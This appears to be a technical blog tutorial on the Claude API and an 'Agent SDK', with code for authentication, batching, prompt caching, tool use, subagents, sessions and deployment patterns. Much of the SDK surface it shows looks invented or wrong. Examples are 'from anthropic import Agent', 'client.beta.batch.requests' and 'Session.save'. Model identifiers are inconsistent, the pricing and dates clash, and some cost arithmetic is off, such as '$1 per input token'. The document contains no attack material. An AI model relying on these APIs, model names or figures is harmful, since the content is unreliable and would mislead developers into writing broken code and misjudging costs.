Claude API & Agent SDK

The Claude API is a REST interface for programmatic access to Claude models; the Agent SDK (Python/TypeScript) provides high-level abstractions for building autonomous AI agents with tool use, sessions, subagents, and cost tracking -- enabling production deployments from internal knowledge assistants to full-stack agentic workflows.

Posted Dec 28, 2025

15 min read

The Claude API is a REST interface for programmatic access to Claude models; the Agent SDK (Python/TypeScript) provides high-level abstractions for building autonomous AI agents with tool use, sessions, subagents, and cost tracking — enabling production deployments from internal knowledge assistants to full-stack agentic workflows.

Claude API Fundamentals

The Claude API at api.anthropic.com exposes Claude models via REST, enabling integration into any application, service, or agent framework.

Authentication

        
      
import anthropic

# 1. Direct API key (from console.anthropic.com)
client = anthropic.Anthropic(api_key="sk-ant-...")

# 2. Via environment variable
client = anthropic.Anthropic()  # reads ANTHROPIC_API_KEY env var

# 3. AWS Bedrock (enterprise customers)
import os
os.environ["CLAUDE_CODE_USE_BEDROCK"] = "true"
client = anthropic.Anthropic()

# 4. Google Vertex AI
client = anthropic.Anthropic(
    api_key="",  # empty
    base_url="https://us-central1-aiplatform.googleapis.com/v1beta1/projects/{PROJECT_ID}/locations/us-central1/endpoints/openapi"
)

# 5. Azure AI Foundry
client = anthropic.Anthropic(
    api_key=os.environ["AZURE_API_KEY"],
    base_url="https://{RESOURCE_NAME}.openai.azure.com/v1"
)

Security best practice: Store API keys in environment variables, not hardcoded. Use IAM roles (AWS Bedrock) for production deployments.

Basic Request/Response

        
      
message = client.messages.create(
    model="claude-sonnet-4-20250514",
    max_tokens=1024,
    messages=[
        {
            "role": "user",
            "content": "Write a Python function that calculates fibonacci(n)"
        }
    ]
)

print(message.content[0].text)

Response structure:

        
      
{
  "id": "msg_...",
  "type": "message",
  "role": "assistant",
  "content": [
    {
      "type": "text",
      "text": "def fibonacci(n):\n    ..."
    }
  ],
  "model": "claude-sonnet-4-20250514",
  "stop_reason": "end_turn",
  "stop_sequence": null,
  "usage": {
    "input_tokens": 15,
    "output_tokens": 87
  }
}

Token Pricing & Cost Optimization

Current Pricing (as of Feb 2025)

Model	Input (per MTok)	Output (per MTok)	Batch Input	Batch Output	Context	Notes
Claude Opus 4.6	$5.00	$25.00	$2.50	$12.50	1M	Extended thinking (+40-60% tokens)
Claude Sonnet 4.6	$3.00	$15.00	$1.50	$7.50	1M	Recommended for production
Claude Haiku 4.5	$1.00	$5.00	$0.50	$2.50	200k	Cost-optimized, fast

Example monthly cost (Sonnet, 1M input + 500k output tokens):

Pay-as-you-go: (1M × $3) + (500k × $15) = $10.50
Batch API: (1M × $1.50) + (500k × $7.50) = $5.25
Savings: 50%

Token Accounting

Overhead per API call:

Base overhead: ~10 tokens
Tool use: +346 tokens for Opus/Sonnet, +264 for Haiku (system setup)
Extended thinking: +3-4x total tokens when enabled

Practical example:

        
      
# Simple query
message = client.messages.create(
    model="claude-sonnet-4-20250514",
    max_tokens=100,
    messages=[{"role": "user", "content": "What is 2+2?"}]
)

# Cost: 14 input tokens (question) × $3/MTok = $0.000042
# Plus: 7 output tokens (answer) × $15/MTok = $0.000105
# Total: ~$0.00015 per call

Cost Optimization Strategies

1. Batch API (-50%)

Process multiple requests asynchronously (overnight, off-peak) at half price:

        
      
import anthropic
import json
import time

client = anthropic.Anthropic()

# Prepare batch requests
batch_requests = [
    {
        "custom_id": "request_1",
        "params": {
            "model": "claude-sonnet-4-20250514",
            "max_tokens": 1024,
            "messages": [{"role": "user", "content": "Summarize this document..."}],
        },
    },
    # ... 100s more requests
]

# Submit batch
batch = client.beta.batch.requests.create(
    requests=batch_requests
)

print(f"Batch {batch.id} submitted. Processing...")

# Poll for completion (can take hours)
while True:
    status = client.beta.batch.requests.retrieve(batch.id)
    print(f"Status: {status.processing_count} processing, {status.succeeded_count} done")

    if status.processing_count == 0:
        break

    time.sleep(30)  # Check every 30 seconds

# Fetch results
results = client.beta.batch.requests.list(batch.id)
for result in results:
    print(f"{result.custom_id}: {result.result.message.content[0].text}")

When to use:

Overnight document processing (contracts, reports)
Bulk data analysis (10k+ documents)
Weekly/monthly batch jobs
Not for real-time user queries (unacceptable latency)

2. Prompt Caching (0.1x hit cost)

Cache repeated context so reads cost 1/10th of writes:

        
      
# First request: Create cache (1.25x write cost)
message = client.messages.create(
    model="claude-sonnet-4-20250514",
    max_tokens=1024,
    system=[
        {
            "type": "text",
            "text": """You are an expert code reviewer.
            Analyze code for: performance, security, maintainability, testing."""
        },
        {
            "type": "text",
            "text": "Here's the entire codebase:\n" + open("codebase.txt").read(),
            "cache_control": {"type": "ephemeral"}
        }
    ],
    messages=[{"role": "user", "content": "Review src/auth.ts"}]
)

# Subsequent requests (5 min window): Cache hit (0.1x read cost)
for file in ["src/api.ts", "src/db.ts", "src/middleware.ts"]:
    message = client.messages.create(
        model="claude-sonnet-4-20250514",
        max_tokens=1024,
        system=[
            {
                "type": "text",
                "text": """You are an expert code reviewer.
                Analyze code for: performance, security, maintainability, testing."""
            },
            {
                "type": "text",
                "text": "Here's the entire codebase:\n" + open("codebase.txt").read(),
                "cache_control": {"type": "ephemeral"}
            }
        ],
        messages=[{"role": "user", "content": f"Review {file}"}]
    )

Economics:

Codebase: 500k tokens
First request: 500k × $3 × 1.25 = $1.875 (write to cache)
Requests 2-5: 500k × $3 × 0.1 = $0.15 each (cache hit)
Total: $1.875 + 4×$0.15 = $2.475 vs. $7.50 without cache
Savings: 67%

Break-even: Typically after 5-10 reads of cached content.

3. US-Only Data Residency (+10%)

Opt-in: data stays in US, never exported internationally.

        
      
client = anthropic.Anthropic(
    api_key="sk-ant-...",
    default_headers={"anthropic-beta": "data-residency-us"}
)

Cost: +10% (Sonnet input becomes $3.30)

When needed: Healthcare, PII, financial data, compliance-sensitive workflows.

4. Smart Model Selection

Heuristic: Start with Sonnet, profile usage, migrate 30-40% to Haiku.

        
      
# Adaptive model selection based on task complexity
def choose_model(task_complexity: str) -> str:
    """Select appropriate model for task."""
    if task_complexity == "simple":
        return "claude-haiku-4-20250514"  # 1x cost
    elif task_complexity == "medium":
        return "claude-sonnet-4-20250514"  # 3x cost
    else:  # complex reasoning, extended thinking
        return "claude-opus-4-20250514"    # 5x cost

# Usage
for task in tasks:
    model = choose_model(task["complexity"])
    # ... make API call with model

Tool Use (Function Calling)

Tools enable Claude to call functions in your application, enabling agentic loops:

        
      
# 1. Define tools
tools = [
    {
        "name": "calculate_investment_return",
        "description": "Calculate ROI for an investment",
        "input_schema": {
            "type": "object",
            "properties": {
                "principal": {"type": "number", "description": "Initial investment"},
                "rate": {"type": "number", "description": "Annual interest rate (%)"},
                "years": {"type": "integer", "description": "Investment period"},
            },
            "required": ["principal", "rate", "years"],
        },
    },
    {
        "name": "fetch_stock_price",
        "description": "Get current stock price",
        "input_schema": {
            "type": "object",
            "properties": {
                "ticker": {"type": "string", "description": "Stock ticker (e.g., AAPL)"},
            },
            "required": ["ticker"],
        },
    },
]

# 2. Make request with tools
messages = [
    {
        "role": "user",
        "content": "If I invest $10k at 7% for 5 years, what's my return? Also fetch AAPL stock price."
    }
]

response = client.messages.create(
    model="claude-sonnet-4-20250514",
    max_tokens=1024,
    tools=tools,
    messages=messages,
)

# 3. Process tool calls in agentic loop
while response.stop_reason == "tool_use":
    # Extract tool calls
    tool_calls = [block for block in response.content if block.type == "tool_use"]

    # Execute tools
    tool_results = []
    for tool_call in tool_calls:
        if tool_call.name == "calculate_investment_return":
            principal = tool_call.input["principal"]
            rate = tool_call.input["rate"]
            years = tool_call.input["years"]
            result = principal * ((1 + rate/100) ** years)

            tool_results.append({
                "type": "tool_result",
                "tool_use_id": tool_call.id,
                "content": f"Return: ${result:.2f}",
            })

        elif tool_call.name == "fetch_stock_price":
            ticker = tool_call.input["ticker"]
            # Simulate fetch (real: call API)
            price = 150.25  # Mock data

            tool_results.append({
                "type": "tool_result",
                "tool_use_id": tool_call.id,
                "content": f"{ticker} price: ${price}",
            })

    # Continue conversation with tool results
    messages.append({"role": "assistant", "content": response.content})
    messages.append({"role": "user", "content": tool_results})

    response = client.messages.create(
        model="claude-sonnet-4-20250514",
        max_tokens=1024,
        tools=tools,
        messages=messages,
    )

# 4. Extract final answer
final_answer = next(
    (block.text for block in response.content if hasattr(block, "text")),
    None
)
print(final_answer)

Output:

If you invest $10,000 at 7% annual interest for 5 years, your investment will grow to approximately $14,025.52, representing a gain of about $4,025.52 or 40.26%.

AAPL is currently trading at $150.25.

Agent SDK (High-Level Abstractions)

The Agent SDK wraps the API with higher-level tools for building autonomous agents.

Basic Agent

        
      
from anthropic import Agent
from anthropic.tools import bash, read_file, write_file, grep

# Create agent with built-in tools
agent = Agent(
    model="claude-sonnet-4-20250514",
    tools=[bash, read_file, write_file, grep],
)

# Run autonomous task
result = agent.run("Write a Python test file for src/auth.ts tests")

print(result)
# Agent autonomously:
# 1. Read src/auth.ts (understand what to test)
# 2. Generate test file content
# 3. Write to src/auth.test.ts
# 4. Run tests to verify

Subagents (Parallel Execution)

        
      
from anthropic import Agent, create_subagent

main_agent = Agent(
    model="claude-sonnet-4-20250514",
    system="You orchestrate feature development across teams.",
)

# Create specialized subagents
frontend_agent = create_subagent(
    "frontend",
    system="You're an expert React developer.",
    model="claude-sonnet-4-20250514",
)

backend_agent = create_subagent(
    "backend",
    system="You're an expert backend engineer.",
    model="claude-sonnet-4-20250514",
)

test_agent = create_subagent(
    "testing",
    system="You're a QA engineer focused on comprehensive testing.",
    model="claude-haiku-4-20250514",  # Lower cost
)

# Orchestrate
result = main_agent.run("""
Implement a user authentication feature:
1. Frontend agent: Build login UI component
2. Backend agent: Build auth API endpoints
3. Test agent: Write unit and integration tests

All run in parallel, then integrate results.
""", subagents=[frontend_agent, backend_agent, test_agent])

Sessions (Persistent Context)

        
      
from anthropic import Agent, Session

# Create persistent session
session = Session(
    model="claude-sonnet-4-20250514",
    agent_system="You are a code review expert for Python projects."
)

# First interaction: Set context
session.run("Our project uses async/await patterns. Review all code with this in mind.")

# Second interaction: Leverages context from first
session.run("Review src/database.py for best practices")

# Third interaction: Still has context
session.run("What patterns are we missing?")

# Save session for later
session.save("code_review_session.pkl")

# Load and resume
loaded_session = Session.load("code_review_session.pkl")
loaded_session.run("Now review src/api.py")

Cost Tracking

        
      
from anthropic import Agent
import json

agent = Agent(
    model="claude-sonnet-4-20250514",
    track_cost=True,
)

# Run task
result = agent.run("Analyze this codebase for performance issues", tools=[...])

# Extract costs
print(json.dumps(agent.cost_tracking, indent=2))
# Output:
# {
#   "total_input_tokens": 2540,
#   "total_output_tokens": 1235,
#   "total_cost": "$0.1048",
#   "steps": [
#     {"step": 1, "tool": "read_file", "input_tokens": 340, "output_tokens": 125, "cost": "$0.0105"},
#     ...
#   ]
# }

Multimodal Input (Vision)

Claude supports image input:

        
      
import base64
import os

# Load image
with open("screenshot.png", "rb") as img_file:
    image_data = base64.standard_b64encode(img_file.read()).decode("utf-8")

message = client.messages.create(
    model="claude-sonnet-4-20250514",
    max_tokens=1024,
    messages=[
        {
            "role": "user",
            "content": [
                {
                    "type": "image",
                    "source": {
                        "type": "base64",
                        "media_type": "image/png",
                        "data": image_data,
                    },
                },
                {
                    "type": "text",
                    "text": "Describe the UI layout and identify potential UX improvements.",
                },
            ],
        }
    ],
)

print(message.content[0].text)

Use cases:

Screenshot analysis (UX review)
Document OCR (extract tables, text from PDFs)
Diagram interpretation (architecture diagrams, flow charts)
Product screenshot comparison (competitive analysis)

Streaming (Real-Time Output)

For user-facing applications, stream responses as they arrive:

        
      
# Streaming text and tool use
with client.messages.stream(
    model="claude-sonnet-4-20250514",
    max_tokens=1024,
    messages=[{"role": "user", "content": "Write a poem about AI"}],
) as stream:
    for text in stream.text_stream:
        print(text, end="", flush=True)  # Print as chunks arrive

    print(f"\nTotal tokens: {stream.get_final_message().usage.output_tokens}")

Benefits:

Lower perceived latency (user sees output immediately)
Better UX (don’t wait for full response)
Terminal-friendly (real-time printing)

Production Deployment Patterns

Pattern 1: Internal Knowledge Assistant

        
      
from anthropic import Agent
from anthropic.tools import read_file, bash, grep

class KnowledgeAssistant:
    def __init__(self, docs_dir: str):
        self.docs_dir = docs_dir
        self.agent = Agent(
            model="claude-sonnet-4-20250514",
            system=f"""You're the company's internal knowledge assistant.
            Help employees find answers in {docs_dir}.
            Always link to the source document.""",
            tools=[read_file, grep],
        )

    def answer_question(self, question: str) -> str:
        """Answer questions about company knowledge base."""
        result = self.agent.run(question)
        return result

# Usage
assistant = KnowledgeAssistant("/internal/docs")
answer = assistant.answer_question("How do we handle multi-tenant isolation?")
print(answer)

Pattern 2: Autonomous Agent with Safeguards

        
      
from anthropic import Agent
from anthropic.tools import bash

class SafeAgent:
    def __init__(self, allowed_commands: list):
        self.allowed_commands = allowed_commands
        self.agent = Agent(
            model="claude-sonnet-4-20250514",
            tools=[self._safe_bash],
        )

    def _safe_bash(self, command: str) -> str:
        """Only allow whitelisted commands."""
        if not any(cmd in command for cmd in self.allowed_commands):
            return f"Command not allowed: {command}"

        return bash(command)

    def run_task(self, task: str) -> str:
        """Run task with command safeguards."""
        return self.agent.run(task)

# Usage
agent = SafeAgent(allowed_commands=["npm test", "npm run lint", "git status"])
result = agent.run_task("Run tests and report results")

Pattern 3: Cost-Optimized Batch Processing

        
      
from anthropic import Agent
import json

def process_documents(documents: list[str]) -> list[str]:
    """Process large document set with Batch API + Haiku."""

    # Prepare batch requests
    requests = []
    for i, doc in enumerate(documents):
        requests.append({
            "custom_id": f"doc_{i}",
            "params": {
                "model": "claude-haiku-4-20250514",  # Low cost
                "max_tokens": 256,
                "messages": [
                    {"role": "user", "content": f"Summarize:\n{doc}"}
                ],
            },
        })

    # Submit batch
    client = anthropic.Anthropic()
    batch = client.beta.batch.requests.create(requests=requests)

    # Wait for completion and collect results
    # (polling code omitted for brevity)

    results = [r.result.message.content[0].text for r in batch_results]
    return results

# Cost: 100k documents × $1 per input token = $100 with Haiku
# vs. Sonnet would be $300

Key Properties

Property	Value	Notes
Request latency	2-10 seconds (median)	Depends on model, complexity, tool use
Max tokens per request	4M (theoretical)	Practical limit: 1M for context, 128k for output
Tool use overhead	264-346 tokens	System setup cost per request with tools
Batch processing time	5 min - 24 hours	Depends on queue; usually completes in 5-30 min
Prompt caching duration	5 minutes	TTL for cached content
Streaming latency	200-500ms (time-to-first-token)	Faster than non-streaming
RPS (requests per second)	100+ (standard), 1000+ (enterprise)	Rate limits enforced per account
Uptime SLA	99.9% (implied)	No explicit SLA published; empirically reliable

Real-World Implementation Example

Scenario: Engineering Leader building an internal incident response agent

        
      
from anthropic import Agent, create_subagent
from anthropic.tools import bash, read_file, grep

def build_incident_response_agent():
    """Build autonomous incident response system."""

    main_agent = Agent(
        model="claude-sonnet-4-20250514",
        system="You are an incident response expert. Triage, analyze, and remediate.",
        track_cost=True,
    )

    # Specialized subagents
    log_analyzer = create_subagent(
        "logs",
        system="You're an expert at analyzing application logs.",
        model="claude-haiku-4-20250514",
    )

    db_expert = create_subagent(
        "database",
        system="You're a database expert. Analyze queries, locks, and performance.",
        model="claude-haiku-4-20250514",
    )

    # Orchestrate incident response
    def handle_incident(error_summary: str):
        """Respond to incident autonomously."""

        # Main agent coordinates
        result = main_agent.run(f"""
        Production incident: {error_summary}

        Coordinate response:
        1. Log analyzer: Parse error logs, identify root cause
        2. DB expert: Check database queries and locks
        3. Recommend fix and verify with tests

        Subagents: {[log_analyzer, db_expert]}
        """, subagents=[log_analyzer, db_expert])

        print(f"Incident resolved. Cost: {main_agent.cost_tracking['total_cost']}")
        return result

    return handle_incident

# Usage
handler = build_incident_response_agent()
result = handler("Payment API returning 500 errors. Last 100 errors in logs/error.log")

When to Use API vs. Alternatives

Use Case	Claude API	Claude.ai	Claude Code	Claude Cowork
Production application	Yes	No	No	No
Internal knowledge bot	Yes	Limited users	Engineers only	Yes
Autonomous agent	Yes	No	Yes (coding)	Yes (ops)
Cost-sensitive batch	Yes (Batch API)	No	No	No
Interactive brainstorm	No	Yes	No	No

References

Official Documentation:

Guides & Tutorials:

“Building Production Agents” (best practices, safeguards)
“Cost Optimization Strategies” (batch, caching, model selection)
“Streaming for User-Facing Apps”

Video Resources:

Anthropic: “Claude API Deep Dive” (40 min technical overview)
“Building an Agent from Scratch” (hands-on tutorial, 30 min)
ByteByteGo: “Prompt Caching Economics” (cost analysis)

Community & Code:

Claude SDK Repository
Example projects: customer support bot, code reviewer, data analyzer
Anthropic Discord: #api-help for questions

Last Updated: Feb 2025

Author: Principal Engineer, knowledge vault

AI & Agents, Agentic AI

agent-frameworks

This post is licensed under CC BY 4.0 by the author.